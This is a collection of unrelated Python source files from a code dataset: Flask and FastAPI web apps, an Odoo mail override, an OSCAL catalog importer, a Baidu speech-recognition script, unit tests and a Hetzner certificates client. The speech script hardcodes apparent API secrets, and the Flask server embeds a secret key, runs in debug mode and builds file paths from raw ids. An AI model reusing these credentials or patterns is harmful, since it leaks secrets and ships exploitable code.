file)\r\n\r\n@app.route('/fonts/<file>')\r\ndef fonts(file):\r\n\treturn send_from_directory('templates/fonts', file)\r\n\r\n@app.route('/js/<file>')\r\ndef js(file):\r\n\treturn send_from_directory('templates/js', file)\r\n\r\n\r\n# ___ Routes for IMAGES ___ #\r\n@app.route('/images/<file>')\r\ndef images(file):\r\n\tif file == 'profil':\r\n\t\treturn send_from_directory('./profil_pictures','{0}.jpeg'.format(session['userID']))\r\n\treturn send_from_directory('templates/images', file)\r\n\r\n@app.route('/profil_pictures/<id>')\r\ndef profil_pictures(id):\r\n\tphoto = glob.glob('./profil_pictures/{0}.*'.format(id))\r\n\tif photo:\r\n\t\tphoto = photo[0]\r\n\t\tprint(\"PHOTO is {0}\".format(photo))\r\n\tif photo :\r\n\t\treturn send_file(photo)\r\n\telse :\r\n\t\treturn send_from_directory('./profil_pictures','unknown.jpg')\r\n\r\n@app.route('/event_pictures/<id>')\r\ndef event_pictures(id):\r\n\tphoto = glob.glob('./event_pictures/{0}.*'.format(id))\r\n\tif photo:\r\n\t\tphoto = photo[0]\r\n\t\tprint(\"PHOTO is {0}\".format(photo))\r\n\tif photo :\r\n\t\treturn send_file(photo)\r\n\telse :\r\n\t\treturn send_from_directory('./event_pictures','unknown.png')\r\n\r\n\r\napp.secret_key = '\\xd6\\x94|\\x98\\x87Y\\x1d\\x8ea\\xdb\\x14HW\\x04\\x0f\\x80\\x11i\\xc0\\x8f\\xa2\\x931\\x8e'\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)\r\n\tconnection.close()\r\n","sub_path":"Archives/Back-End Flask-Pyhtonv6/serveur.py","file_name":"serveur.py","file_ext":"py","file_size_in_byte":16431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"600091984","text":"from fastapi import FastAPI, Query\nfrom get_response_msg import *\nfrom model import *\n\napp = FastAPI()\n\n\n@app.get(\"/\")\nasync def root():\n    return {\"message\": \"COVID-19 DATA OF CN, USA & THE WORLD\"}\n\n\n@app.get(\"/ncov/world_today\", response_model=WorldTodayModel)\nasync def get_world_data_today():\n    data = get_world_today()\n    return data\n\n\n@app.get(\"/ncov/cn_province_today\", response_model=ProvinceTodayModel)\nasync def get_china_province_data_today():\n    data = get_cn_province_today()\n    return data\n\n\n@app.get(\"/ncov/cn_data_stream\", response_model=CountryDataStreamModel)\nasync def get_china_data_stream(\n    start_date: str = Query(..., description='start Date', example='2019-12-01'),\n    end_date: str = Query(..., description='end date', example='2021-02-03')\n):\n    data = get_cn_data_stream(start_date, end_date)\n    return data\n\n\n@app.get(\"/ncov/us_data_stream\", response_model=CountryDataStreamModel)\nasync def get_usa_data_stream(\n    start_date: str = Query(..., description='start Date', example='2019-12-01'),\n    end_date: str = Query(..., description='end date', example='2021-02-03')):\n    data = get_us_data_stream(start_date, end_date)\n    return data\n\n\n@app.get(\"/ncov/us_state_today\", response_model=ProvinceTodayModel)\nasync def get_usa_state_data_today():\n    data = get_us_state_today()\n    return data\n\n\n@app.get(\"/ncov/us_city_today\")\nasync def get_usa_city_data_today():\n    data = get_us_city_today()\n    return data\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"652741329","text":"# -*- coding: utf-8 -*-\n\nfrom openerp.osv import fields, osv\n\nclass mail_message(osv.osv):\n\n    _inherit=\"mail.message\"\n\n    def _notify(self, cr, uid, newid, context=None):\n        \"\"\" Add the related record 
followers to the destination partner_ids if is not a private message.\n Call mail_notification.notify to manage the email sending\n \"\"\"\n notification_obj = self.pool.get('mail.notification')\n message = self.browse(cr, uid, newid, context=context)\n\n partners_to_notify = set([])\n # message has no subtype_id: pure log message -> no partners, no one notified\n if not message.subtype_id:\n return True\n\n #bsbs remove adding follower to mail\n # all followers of the mail.message document have to be added as partners and notified\n #if message.model and message.res_id:\n # fol_obj = self.pool.get(\"mail.followers\")\n \t# # browse as SUPERUSER because rules could restrict the search results\n # fol_ids = fol_obj.search(cr, SUPERUSER_ID, [\n # ('res_model', '=', message.model),\n # ('res_id', '=', message.res_id),\n # ('subtype_ids', 'in', message.subtype_id.id)\n # ], context=context)\n # partners_to_notify |= set(fo.partner_id for fo in fol_obj.browse(cr, SUPERUSER_ID, fol_ids, context=context))\n\n # remove me from notified partners, unless the message is written on my own wall\n if message.author_id and message.model == \"res.partner\" and message.res_id == message.author_id.id:\n partners_to_notify |= set([message.author_id])\n elif message.author_id:\n partners_to_notify -= set([message.author_id])\n\n # all partner_ids of the mail.message have to be notified regardless of the above (even the author if explicitly added!)\n if message.partner_ids:\n partners_to_notify |= set(message.partner_ids)\n\n # notify\n if partners_to_notify:\n notification_obj._notify(cr, uid, newid, partners_to_notify=[p.id for p in partners_to_notify], context=context)\n message.refresh()\n\n # An error appear when a user receive a notification without notifying\n # the parent message -> add a read notification for the parent\n if message.parent_id:\n # all notified_partner_ids of the mail.message have to be notified for the parented messages\n partners_to_parent_notify = set(message.notified_partner_ids).difference(message.parent_id.notified_partner_ids)\n for partner in partners_to_parent_notify:\n notification_obj.create(cr, uid, {\n 'message_id': message.parent_id.id,\n 'partner_id': partner.id,\n 'read': True,\n }, context=context)\nmail_message()","sub_path":"wf_mail/mail_message.py","file_name":"mail_message.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"418261028","text":"import binascii\nimport mptn as MPTN\nimport struct\nfrom gevent import socket\n\nHEADER_FORMAT_STR = \"!\" + ''.join([{1:'B',2:'H',4:'I',8:'Q'}[i] for i in MPTN.MULT_PROTO_HEADER_FORMAT])\n\ndef split_packet_header(message):\n return [message[MPTN.MULT_PROTO_DEST_BYTE_OFFSET:MPTN.MULT_PROTO_SRC_BYTE_OFFSET], message[MPTN.MULT_PROTO_SRC_BYTE_OFFSET:MPTN.MULT_PROTO_MSG_TYPE_BYTE_OFFSET], message[MPTN.MULT_PROTO_MSG_TYPE_BYTE_OFFSET:MPTN.MULT_PROTO_MSG_SUBTYPE_BYTE_OFFSET], message[MPTN.MULT_PROTO_MSG_SUBTYPE_BYTE_OFFSET:MPTN.MULT_PROTO_MSG_PAYLOAD_BYTE_OFFSET]]\n\ndef formatted_print(msg):\n \"\"\"Receives all message parts from socket, printing each frame neatly\"\"\"\n r = \"----------------------------------------\\n\"\n for part in msg:\n r += \"[%03d]\" % len(part) # Trailing comma suppresses newline\n try:\n r += \"%s\" % part.decode('ascii')\n r += \"\\t(\"\n r += r\"0x%s\" % (binascii.hexlify(part).decode('ascii'))\n r += \")\"\n except UnicodeDecodeError:\n r += r\"0x%s\" % (binascii.hexlify(part).decode('ascii'))\n r += 
'\\n'\n return r\n\ndef create_mult_proto_header_to_str(dest_did, src_did, msg_type, msg_subtype):\n l = [dest_did, src_did, msg_type, msg_subtype]\n h = struct.pack(HEADER_FORMAT_STR, *l)\n return h\n\ndef extract_mult_proto_header_from_str(s):\n header = s[:MPTN.MULT_PROTO_MSG_PAYLOAD_BYTE_OFFSET]\n return struct.unpack(HEADER_FORMAT_STR, header)\n\ndef special_recv(sock):\n size = sock.recv(struct.calcsize(\"!L\"))\n size = socket.ntohl(struct.unpack(\"!L\", size)[0])\n message = \"\"\n while len(message) < size:\n message += sock.recv(size - len(message))\n return message\n\ndef special_send(sock, message):\n size = struct.pack(\"!L\",socket.htonl(len(message)))\n sock.send(size)\n sock.sendall(message)","sub_path":"wukong/gateway/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"647539382","text":"import paho.mqtt.client as mqtt\n\n# get the localhost IP by using \"hostname -I\" in terminal\nbroker_ip = \"10.128.0.3\"\n\n# 1883 is a default port that is unencrypted\nbroker_port = 1883\n\ndef imitation_bme():\n bme_data = \"\"\n return bme_data\n\nif __name__ == '__main__':\n client = mqtt.Client()\n client.connect(broker_ip, broker_port)\n client.publish(topic=\"OpenAgBloom/Air/BME\", payload=imitation_bme(), qos=1,\n retain=False)\n","sub_path":"environmental-boat-project/publisher2.py","file_name":"publisher2.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"180287920","text":"#!/usr/bin/env python\n\nimport sys\nimport os\n\ndef checkdir(outfile):\n outdir = os.path.dirname(outfile)\n if outdir == '':\n outdir = os.getcwd()\n if not os.path.isdir(outdir):\n print('\\nThe directory {} doesn\\'t exist...'.format(outdir)\\\n + 'creating it...\\n')\n os.makedirs(outdir)\n return\n","sub_path":"support_functions/checkdir.py","file_name":"checkdir.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"384563596","text":"from scripts.usefullFunctions import *\nimport ssp.models as t\nimport json\nimport os\nimport shutil\nimport sys\n\nadded_nist_controls = 0\nupdated_nist_controls = 0\ncontrol_baseline = t.control_baseline\n\ndef break_up_catalog(file_path, file_name):\n \"\"\"\n Takes an OSCAL Catalog file and breaks it into seperate json files.\n One file is created for each family, control, and enhancement\n family file will contain all controls and control file will contain all enhancements\n so you cna go on to process these at whatever level you want\n \"\"\"\n startLogging()\n logging.debug(\"Loading JSON...\")\n\n catalog_source = file_name.replace('.json', '')\n catalog_dir = BASE_DIR + '/source/tmp/' + catalog_source\n\n if os.path.isdir(catalog_dir):\n shutil.rmtree(catalog_dir)\n os.makedirs(catalog_dir)\n\n catalogDict = json.loads(open(file_path, 'r', encoding='utf8').read())\n\n for group in catalogDict['catalog']['groups']:\n group_directory_name = catalog_dir + \"/\" + group.get(\"id\") + \"/\"\n os.makedirs(group_directory_name)\n # gf = open(group_file_name,'w')\n # json.dump(group,gf,indent=4)\n for control in group['controls']:\n control[\"group_title\"] = group[\"title\"]\n control[\"catalog\"] = catalog_source\n control_file_name = group_directory_name + control['id'] + \".json\"\n cf = open(control_file_name, 'w', encoding='utf8')\n 
json.dump(control, cf, indent=4)\n if 'controls' in control:\n for enhancement in control['controls']:\n enhancement[\"group_title\"] = group[\"title\"]\n enhancement[\"catalog\"] = catalog_source\n enhancement_file_name = group_directory_name + enhancement['id'] + \".json\"\n ef = open(enhancement_file_name, 'w', encoding='utf8')\n json.dump(enhancement, ef, indent=4)\n\ndef import_all_controls(path):\n \"\"\"\n imports all control json files in given directory\n \"\"\"\n import os\n if control_baseline:\n control_baseline.controls.clear()\n for root, dirs, files in os.walk(path, topdown=False):\n for name in files:\n if name.endswith(\".json\"):\n import_individual_control(os.path.join(root, name))\n # for name in dirs:\n # print(os.path.join(root, name))\n\n\ndef save_parameter(id, type, text, nist_control, depends_on=''):\n param_id, created = t.nist_control_parameter.objects.update_or_create(param_id=id, nist_control=nist_control,\n defaults={'param_id':id,\n 'param_type':type,\n 'param_text':text,\n 'param_depends_on':depends_on,\n 'nist_control':nist_control\n })\n return param_id\n\n\ndef clean_param_text(str):\n str = str.translate(str.maketrans('', '', '\\n\\t\\r')).split(' ')\n while ('' in str):\n str.remove('')\n return ' '.join(str)\n\n\ndef import_individual_control(file_name):\n logging.debug(\"Opening file \" + file_name)\n cntrl = json.loads(open(file_name, 'r', encoding='utf8').read())\n group_id = str(cntrl[\"id\"][0:2]).upper()\n group_title = cntrl[\"group_title\"]\n cntrl_catalog = cntrl[\"catalog\"]\n parameter_list = []\n cntrl_status = \"Active\"\n cntrl_label = \"\"\n cntrl_sortID = \"\"\n global added_nist_controls, updated_nist_controls\n\n\n for item in cntrl[\"properties\"]:\n if item[\"name\"] == 'status':\n cntrl_status = item[\"value\"]\n if item[\"name\"] == 'label':\n cntrl_label = item[\"value\"]\n if item[\"name\"] == 'sort-id':\n cntrl_sortID = item[\"value\"]\n\n control_id, created = t.nist_control.objects.update_or_create(group_id=group_id,\n group_title=group_title,\n source=cntrl_catalog,\n control_id=cntrl[\"id\"],\n defaults={'group_id':group_id,\n 'group_title':group_title,\n 'source':cntrl_catalog,\n 'control_id':cntrl[\"id\"],\n 'control_title':cntrl[\"title\"],\n 'label':cntrl_label,\n 'sort_id':cntrl_sortID,\n 'status':cntrl_status,\n 'catalog':cntrl_catalog\n })\n\n if control_baseline:\n control_baseline.controls.add(control_id)\n\n if not created:\n logging.debug(\"Found existing entry for \" + cntrl[\"title\"] + \" from catalog \" + cntrl_catalog)\n updated_nist_controls += 1\n\n else:\n logging.debug(\"No existing entry for \" + cntrl[\"title\"] + \"from catalog \" + cntrl_catalog + \" found. 
Created New entry.\")\n added_nist_controls += 1\n\n\n\n if 'parameters' in cntrl:\n for param in cntrl['parameters']:\n param_id = None\n if 'label' in param:\n if 'depends-on' in param:\n param_id = save_parameter(param[\"id\"], \"label\", clean_param_text(param['label']), control_id,\n param[\"depends-on\"])\n else:\n param_id = save_parameter(param[\"id\"], \"label\", clean_param_text(param['label']), control_id)\n if 'select' in param:\n param_text = ','.join(param['select']['alternatives'])\n param_id = save_parameter(param[\"id\"], \"select\", clean_param_text(param_text), control_id)\n\n\n if 'parts' in cntrl:\n cntrl_stmnt_text = ''\n logging.debug(\"Found parts, extracting (better strap in, this could get messy)...\")\n for part in cntrl['parts']:\n cntrl_stmnt_text += addControlPart(part)\n t.nist_control_statement.objects.get_or_create(statement_type=part['name'],\n nist_control_id=control_id.id,\n statement_text=cntrl_stmnt_text)\n cntrl_stmnt_text = ''\n\n\ndef addControlPart(part, indent=0):\n t = ''\n logging.debug(\"Extracting Part...\")\n if 'title' in part:\n logging.debug(\"Found part Title...\")\n t = \"\" + part['title'] + \"\"\n logging.debug(\"Title added...\")\n if 'properties' in part:\n logging.debug(\"Found properties, extracting...\")\n for p in part['properties']:\n if p['name'] == 'label':\n t += '
\\n' + str(' ' * indent) + p['value'] + ' '\n                logging.debug(\"Property added...\")\n    if 'prose' in part:\n        logging.debug(\"Found prose, extracting...\")\n        t += part['prose']\n        logging.debug(\"Prose added...\")\n    if 'parts' in part:\n        for subpart in part['parts']:\n            logging.debug(\"Found subpart, extracting...\")\n            t += addControlPart(subpart, indent + 2)\n            logging.debug(\"Added subpart...\")\n    return t\n\n\ndef run(catalog_control_baseline=None, file_path=BASE_DIR + '/source/NIST_SP-800-53_rev4_catalog.json', file_name='NIST_SP-800-53_rev4_catalog.json'):\n    global added_nist_controls, updated_nist_controls, control_baseline\n    added_nist_controls = updated_nist_controls = 0\n    control_baseline = catalog_control_baseline\n\n    break_up_catalog(file_path, file_name)\n    #break_up_catalog(BASE_DIR + '/source/', \"NIST_SP-800-53_rev5-FINAL_catalog.json\")\n    import_all_controls(BASE_DIR + '/source/tmp/' + file_name.replace('.json', ''))\n    return added_nist_controls, updated_nist_controls\n\n#Modified this file to use it in import_catalog view which imports one catalog file at a time.\n\n","sub_path":"scripts/OSCAL_Catalog_import.py","file_name":"OSCAL_Catalog_import.py","file_ext":"py","file_size_in_byte":8493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"169572697","text":"# encoding:utf-8\n\nimport pyaudio\nimport wave\nimport sys\nimport numpy as np\nfrom aip import AipSpeech\n\n\n\nclass voice_recognition(object):\n\t\"\"\"Speech recognition class\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\" Your APPID, API key and secret key \"\"\"\n\t\tself._APP_ID = '10498635'\n\t\tself._API_KEY = '7H3a8MI3qNAb9N4RunPegIpr'\n\t\tself._SECRET_KEY = 'aac58e43cc056ca4b616040df77bd845'\n\t\tself._aipSpeech = AipSpeech(self._APP_ID, self._API_KEY, self._SECRET_KEY)\n\n\t# record the sound and write in the wav file\n\tdef record(self):\n\t\tCHUNK = 1024\n\t\tFORMAT = pyaudio.paInt16\n\t\tCHANNELS = 1\n\t\tRATE = 16000\n\t\tRECORD_SECONDS = 5\n\t\tself._WAVE_OUTPUT_FILENAME = 'recorded_audio.wav'\n\n\t\tif sys.platform == 'darwin':\n\t\t\tCHANNELS = 1\n\n\t\tp = pyaudio.PyAudio()\n\n\t\tstream = p.open(format=FORMAT,\n\t\t\t\t\t\tchannels=CHANNELS,\n\t\t\t\t\t\trate=RATE,\n\t\t\t\t\t\tinput=True,\n\t\t\t\t\t\tframes_per_buffer=CHUNK)\n\n\t\tprint(\"You can speak now:\")\n\n\t\tframes = []\n\n\t\tfor i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n\t\t\tdata = stream.read(CHUNK)\n\t\t\tframes.append(data)\n\n\t\tstream.stop_stream()\n\t\tstream.close()\n\t\tp.terminate()\n\n\t\twf = wave.open(self._WAVE_OUTPUT_FILENAME, 'wb')\n\t\twf.setnchannels(CHANNELS)\n\t\twf.setsampwidth(p.get_sample_size(FORMAT))\n\t\twf.setframerate(RATE)\n\t\twf.writeframes(b''.join(frames))\n\t\twf.close()\n\n\t\treturn self._WAVE_OUTPUT_FILENAME\n\n\n\t# Check whether any sound was recorded: return 1 if there is sound, 0 if not, by reading the recorded audio and looking at its frames\n\tdef speaking(self, audiofile, threshold=70):\n\t\twavfile = wave.open(audiofile, \"rb\")\n\t\t# print(wavfile)\n\t\tparams = wavfile.getparams()\n\t\tframesra,frameswav= params[2],params[3]\n\t\tdatawav = wavfile.readframes(frameswav)\n\t\tdatause = np.frombuffer(datawav,dtype = np.short)\n\t\taverage = np.average(abs(datause),weights=abs(datause))\n\t\ttime = np.arange(0, frameswav) * (1.0/framesra)\n\t\t# print(abs(datause))\n\t\t# print('datause=', datause)\n\t\t# print('time=', time)\n\t\t# print('average=', average) # weighted average: larger output values get proportionally more weight\n\t\tif average > threshold: # above the threshold: sound was recorded\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t# recognize the voice\n\tdef recognition(self):\n\t\t# 
aipSpeech.setConnectionTimeoutInMillis(3000)\n\t\t# aipSpeech.setSocketTimeoutInMillis(5000)\n\t\tfile_name = self.record() # call the recording function\n\t\tif self.speaking(file_name): # sound was recorded\n\t\t\tprint(\"Please wait for recognizing ...\")\n\t\t\twith open(file_name, 'rb') as wav_file:\n\t\t\t\t# recognize a local file\n\t\t\t\t#print(type(wav_file))\n\t\t\t\t# a= aipSpeech.asr(get_file_content('public/test.pcm'), 'pcm', 16000, { 'lan': 'zh',})\n\t\t\t\treponse_result =self._aipSpeech.asr(wav_file.read(), 'wav', 16000, { 'lan': 'zh',})\n\t\t\t\tif len(reponse_result)>3: # a failed recognition returns a dict of length 3\n\t\t\t\t\trec_content = reponse_result['result'][0].strip().strip(',')\n\t\t\t\t\tprint('human:', rec_content)\n\t\t\t\t\treturn rec_content\n\t\t\t\telse:\n\t\t\t\t\tprint(reponse_result)\n\t\t\t\t\tprint(\"robot: sorry, I can't listen clearly!\")\n\t\t\t\t\treturn '' # return an empty string if recognition failed\n\t\telse:\n\t\t\tprint('robot: Please continue to speak!')\n\t\t\treturn '' # also return an empty string if no sound was recorded\n\nif __name__ == '__main__':\n\tvoice = voice_recognition() # instantiate the class\n\tcontent = voice.recognition() # call the recognition function\n\t# print(content)\n","sub_path":"script/audio_interactive/voice/voice_recognition.py","file_name":"voice_recognition.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"17048658","text":"# -*- coding: utf-8 -*-\n\n# Copyright (C) 2015 Luis López \n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,\n# USA.\n\n\nimport unittest\n\n\nfrom arroyo.services import Services\nfrom arroyo.query import Query\nfrom arroyo.plugins.providers import IncompatibleQueryError\n\n\nfrom arroyo.plugins.providers.epublibre import EPubLibre\nfrom arroyo.plugins.providers.eztv import EzTV\nfrom arroyo.plugins.providers.torrentapi import TorrentAPI\n\n\nclass TestProviderMixin:\n PROVIDER_CLASS = None\n TEST_HANDLED_URLS = []\n TEST_HANDLED_URLS_NEGATIVE = []\n TEST_QUERY_URLS = []\n\n def _get_provider_cls(self):\n return self.PROVIDER_CLASS\n\n def _get_provider(self):\n return self._get_provider_cls()(Services())\n\n def test_default_uri(self):\n cls = self._get_provider_cls()\n default_uri = getattr(cls, 'DEFAULT_URI', None)\n\n self.assertTrue(isinstance(default_uri, str) and\n default_uri != '',\n msg=\"provider doesn't have default uri\")\n\n self.assertTrue(cls.can_handle(default_uri),\n msg=\"provider can't handle its own default uri\")\n\n def test_handlers(self):\n cls = self._get_provider_cls()\n globs = getattr(cls, 'URI_GLOBS')\n regexps = getattr(cls, 'URI_REGEXPS')\n\n self.assertTrue(isinstance(globs, list))\n self.assertTrue(isinstance(regexps, list))\n self.assertTrue(globs or regexps)\n\n def test_paginate(self):\n # FIXME: Not tested\n provider = self._get_provider()\n g = provider.paginate(provider.DEFAULT_URI)\n\n uris = set()\n count = 0\n for _ in range(10):\n try:\n uris.add(next(g))\n count = count + 1\n except StopIteration:\n break\n\n self.assertTrue(len(uris) > 0,\n msg=\"paginate doesn't produce any element\")\n self.assertTrue(len(uris) == count,\n msg=\"paginate produces duplicates\")\n\n def test_url_handler(self):\n cls = self._get_provider_cls()\n tests = ([(url, True) for url in self.TEST_HANDLED_URLS] +\n [(url, False) for url in self.TEST_HANDLED_URLS_NEGATIVE])\n\n for (url, expected) in tests:\n can_handle = cls.can_handle(url)\n self.assertTrue(can_handle == expected)\n\n def test_query(self):\n provider = self._get_provider()\n for (query, url_or_exc) in self.TEST_QUERY_URLS:\n if isinstance(query, str):\n query = Query.fromstring(query)\n else:\n query = Query(**query)\n\n if type(url_or_exc) is type and issubclass(url_or_exc, Exception):\n with self.assertRaises(url_or_exc):\n provider.get_query_uri(query)\n else:\n url = provider.get_query_uri(query)\n self.assertEqual(url_or_exc, url)\n\n def test_parse(self):\n pass\n\n\nclass TestEPubLibre(TestProviderMixin, unittest.TestCase):\n PROVIDER_CLASS = EPubLibre\n TEST_QUERY_URLS = [\n ('westworld.s01e02', IncompatibleQueryError),\n ('some.movie.2019', IncompatibleQueryError),\n (dict(type='ebook', ebook_title='title'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/title'),\n (dict(type='ebook', ebook_title='title', ebook_author='author'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/author%20title'),\n (dict(type='ebook', ebook_author='author'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/author'),\n (dict(type='ebook', name='title'), 'https://epublibre.org/catalogo/index/0/nuevo/novedades/sin/todos/title'),\n (dict(type='ebook', other='foo'), IncompatibleQueryError),\n ]\n\n\nclass TestEzTV(TestProviderMixin, unittest.TestCase):\n PROVIDER_CLASS = EzTV\n TEST_QUERY_URLS = [\n 
('westworld.s01e02', 'https://eztv.io/search/westworld'),\n        ('some.movie.2019', IncompatibleQueryError)\n    ]\n\n\nclass TestTorrentAPI(TestProviderMixin, unittest.TestCase):\n    PROVIDER_CLASS = TorrentAPI\n    TEST_QUERY_URLS = [\n        ('westworld.s01e02', 'http://torrentapi.org/pubapi_v2.php?app_id=arroyo&mode=search&search_string=westworld+S01E02&category=tv'),\n        ('some.movie.2019', 'http://torrentapi.org/pubapi_v2.php?app_id=arroyo&mode=search&search_string=some+movie&category=movies')\n    ]\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_providers.py","file_name":"test_providers.py","file_ext":"py","file_size_in_byte":5149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"380438470","text":"# -*- coding: utf-8 -*-\nfrom typing import TYPE_CHECKING\n\nfrom hcloud.core.client import ClientEntityBase, BoundModelBase, GetEntityByNameMixin\n\nfrom hcloud.certificates.domain import Certificate\n\n\nif TYPE_CHECKING:\n    from typing import Any, Dict, List, Optional\n    from hcloud.core.domain import Meta, PageResults\n\n\nclass BoundCertificate(BoundModelBase):\n    model = Certificate\n\n    def update(self, name=None, labels=None):\n        # type: (Optional[str], Optional[Dict[str, str]]) -> BoundCertificate\n        \"\"\"Updates a certificate. You can update a certificate's name and labels.\n\n        :param name: str (optional)\n               New name to set\n        :param labels: Dict[str, str] (optional)\n               User-defined labels (key-value pairs)\n        :return: :class:`BoundCertificate <hcloud.certificates.client.BoundCertificate>`\n        \"\"\"\n        return self._client.update(self, name, labels)\n\n    def delete(self):\n        # type: () -> bool\n        \"\"\"Deletes a certificate.\n        :return: boolean\n        \"\"\"\n        return self._client.delete(self)\n\n\nclass CertificatesClient(ClientEntityBase, GetEntityByNameMixin):\n    results_list_attribute_name = 'certificates'\n\n    def get_by_id(self, id):\n        # type: (int) -> BoundCertificate\n        \"\"\"Get a specific certificate by its ID.\n\n        :param id: int\n        :return: :class:`BoundCertificate <hcloud.certificates.client.BoundCertificate>`\n        \"\"\"\n        response = self._client.request(url=\"/certificates/{certificate_id}\".format(certificate_id=id), method=\"GET\")\n        return BoundCertificate(self, response['certificate'])\n\n    def get_list(self,\n                 name=None,  # type: Optional[str]\n                 label_selector=None,  # type: Optional[str]\n                 page=None,  # type: Optional[int]\n                 per_page=None  # type: Optional[int]\n                 ):\n        # type: (...) -> PageResults[List[BoundCertificate], Meta]\n        \"\"\"Get a list of certificates\n\n        :param name: str (optional)\n               Can be used to filter certificates by their name.\n        :param label_selector: str (optional)\n               Can be used to filter certificates by labels. 
The response will only contain certificates matching the label selector.\n        :param page: int (optional)\n               Specifies the page to fetch\n        :param per_page: int (optional)\n               Specifies how many results are returned by page\n        :return: (List[:class:`BoundCertificate <hcloud.certificates.client.BoundCertificate>`], :class:`Meta <hcloud.core.domain.Meta>`)\n        \"\"\"\n        params = {}  # type: Dict[str, Any]\n        if name is not None:\n            params[\"name\"] = name\n\n        if label_selector is not None:\n            params[\"label_selector\"] = label_selector\n\n        if page is not None:\n            params['page'] = page\n\n        if per_page is not None:\n            params['per_page'] = per_page\n\n        response = self._client.request(url=\"/certificates\", method=\"GET\", params=params)\n\n        certificates = [BoundCertificate(self, certificate_data) for certificate_data in response['certificates']]\n\n        return self._add_meta_to_result(certificates, response)\n\n    def get_all(self, name=None, label_selector=None):\n        # type: (Optional[str], Optional[str]) -> List[BoundCertificate]\n        \"\"\"Get all certificates\n\n        :param name: str (optional)\n               Can be used to filter certificates by their name.\n        :param label_selector: str (optional)\n               Can be used to filter certificates by labels. The response will only contain certificates matching the label selector.\n        :return: List[:class:`BoundCertificate <hcloud.certificates.client.BoundCertificate>`]\n        \"\"\"\n        return super(CertificatesClient, self).get_all(name=name, label_selector=label_selector)\n\n    def get_by_name(self, name):\n        # type: (str) -> BoundCertificate\n        \"\"\"Get certificate by name\n\n        :param name: str\n               Used to get certificate by name.\n        :return: :class:`BoundCertificate <hcloud.certificates.client.BoundCertificate>`\n        \"\"\"\n        return super(CertificatesClient, self).get_by_name(name)\n\n    def create(self, name, certificate, private_key, labels=None):\n        # type: (str, str, str, Optional[Dict[str, str]]) -> BoundCertificate\n        \"\"\"Creates a new Certificate with the given name, certificate and private_key.\n\n        :param name: str\n        :param certificate: str\n               Certificate and chain in PEM format, in order so that each record directly certifies the one preceding\n        :param private_key: str\n               Certificate key in PEM format\n        :param labels: Dict[str, str] (optional)\n               User-defined labels (key-value pairs)\n        :return: :class:`BoundCertificate <hcloud.certificates.client.BoundCertificate>`\n        \"\"\"\n        data = {\n            'name': name,\n            'certificate': certificate,\n            'private_key': private_key\n        }  # type: Dict[str, Any]\n        if labels is not None:\n            data['labels'] = labels\n        response = self._client.request(url=\"/certificates\", method=\"POST\", json=data)\n        return BoundCertificate(self, response['certificate'])\n\n    def update(self, certificate, name=None, labels=None):\n        # type: (Certificate, Optional[str], Optional[Dict[str, str]]) -> BoundCertificate\n        \"\"\"Updates a Certificate. 
You can update a certificate name and labels.\n\n :param certificate: :class:`BoundCertificate ` or :class:`Certificate `\n :param name: str (optional)\n New name to set\n :param labels: Dict[str, str] (optional)\n User-defined labels (key-value pairs)\n :return: :class:`BoundCertificate `\n \"\"\"\n data = {} # type: Dict[str, Any]\n if name is not None:\n data['name'] = name\n if labels is not None:\n data['labels'] = labels\n response = self._client.request(url=\"/certificates/{certificate_id}\".format(certificate_id=certificate.id),\n method=\"PUT\",\n json=data)\n return BoundCertificate(self, response['certificate'])\n\n def delete(self, certificate):\n # type: (Certificate) -> bool\n \"\"\"Deletes a certificate.\n\n :param certificate: :class:`BoundCertificate ` or :class:`Certificate `\n :return: True\n \"\"\"\n self._client.request(url=\"/certificates/{certificate_id}\".format(certificate_id=certificate.id),\n method=\"DELETE\")\n # Always return True, because the API does not return an action for it. When an error occurs a HcloudAPIException will be raised\n return True\n","sub_path":"hcloud/certificates/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"376596896","text":"import os\nimport tinify\nimport dropbox\nimport dropbox.files\nimport datetime\n\n# CREATE .txt FILES WITH ACCESS CREDENTIALS\nif os.path.isfile(\"./dropkey.txt\"):\n with open(\"./dropkey.txt\") as file:\n dropkey = file.read()\nelse:\n dropkey = input(\"Type your Dropbox App Token: \")\n with open(\"dropkey.txt\", \"w+\") as f:\n f.write(dropkey)\n\nif os.path.isfile(\"./tinikey.txt\"):\n with 